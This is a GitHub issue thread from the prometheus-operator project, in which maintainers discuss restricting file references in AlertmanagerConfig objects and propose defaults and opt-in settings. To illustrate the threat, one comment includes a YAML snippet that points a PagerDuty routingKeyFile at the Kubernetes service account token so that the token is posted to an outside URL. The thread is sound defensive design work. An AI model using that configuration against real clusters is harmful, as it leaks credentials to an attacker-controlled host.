prometheus-operator
prometheus-operator copied to clipboard
Secure mechanism to allow file references in AlertmanagerConfig objects
Originally posted by @simonpasquier in https://github.com/prometheus-operator/prometheus-operator/issues/6346#issuecomment-2034841318
> are you saying that WebhookURLFile should not be a string, but a secretKeySelector? Or that we shouldn't offer this option at all?
In the upstream Alertmanager configuration, it is often possible to configure sensitive data as an in-lined secret value (e.g. routing_key for PagerDuty) or as a reference to file on-disk (e.g. routing_key_file).
The latter is presumably "more secure" (in Alertmanager context) because the value isn't exposed in-clear within the config file. But the threat model changes in the prometheus-operator context. Leveraging Kubernetes RBAC, it's possible that some users can create/update AlertmanagerConfig objects while they don't have permissions on the Alertmanager resource. Providing a way to reference files from the Alertmanager container's filesystem might allow those users to exfiltrate sensitive data like the service account bearer token (e.g. /var/run/secrets/kubernetes.io/serviceaccount/token).
kind: AlertmanagerConfig
spec:
receivers:
- pager_duty_configs:
- url: http://my-service.example.com
routingKeyFile: /var/run/secrets/kubernetes.io/serviceaccount/token
In this case, someone controlling http://my-service.example.com and would be able to retrieve the token value from the posted payload.
We made the "mistake" early on with ServiceMonitor and had to introduce the .spec.arbitraryFSAccessThroughSMs.deny field in Prometheus to prevent direct access to the Prometheus container filesystem but for backward compatibility reason, it's an opt-in behavior.
Note: there's also a UX problem: AlertmanagerConfig owners need to know the file paths in advance which creates implicit coupling with the Alertmanager owner.
In practice, I would disallow the use of *File fields for AlertmanagerConfig CRDs by default except in 2 cases:
- For the AlertmanagerConfig object used to populate the top-level configuration (
.spec.alertmanagerConfiguration.name). In this case, the same persona should manage theAlertmanagerandAlertmanagerConfigobjects so it makes sense to allow file references. - The Alertmanager owner explicitly allows file references in the Alertmanager spec (for instance
.spec.allowLocalFileReferences: true). Again it could make sense when Alertmanager and AlertmanagerConfig owners are the same person.
@simonpasquier let me know if you'd like to make this change, happy to help
@dongjiang1989 thanks for offering! Before jumping ahead, let's hear from other maintainers, in particular @ArthurSens asked from more details.
Sorry, I don't mean to block the work here 😬
I remember that during the office hours, I mentioned that the UX for the proposed solution still feels a bit clunky, but I honestly couldn't think of anything better. If someone wants to start working on this, it would be great if we can think of something easier to users, but please don't see my comments as a blocker
@ArthurSens can you expand on what you consider being "clunky"?
@ArthurSens can you expand on what you consider being "clunky"?
I feel bad about this, but I honestly don't remember what the problem was :( You can ignore my previous comments
I was taking a look at open PRs today and I've crossed paths with this one (https://github.com/prometheus-operator/prometheus-operator/pull/6358), which introduces the usage of files for web configuration.
I was wondering if we would hit the same problem there. Could someone "steal" file content somehow?
Web configuration is different because these fields live inside the Prometheus/Alertmanager objects. The concern here is when the file reference exists in a "non-pod" CRD like ServiceMonitor, AlertmanagerConfig, ...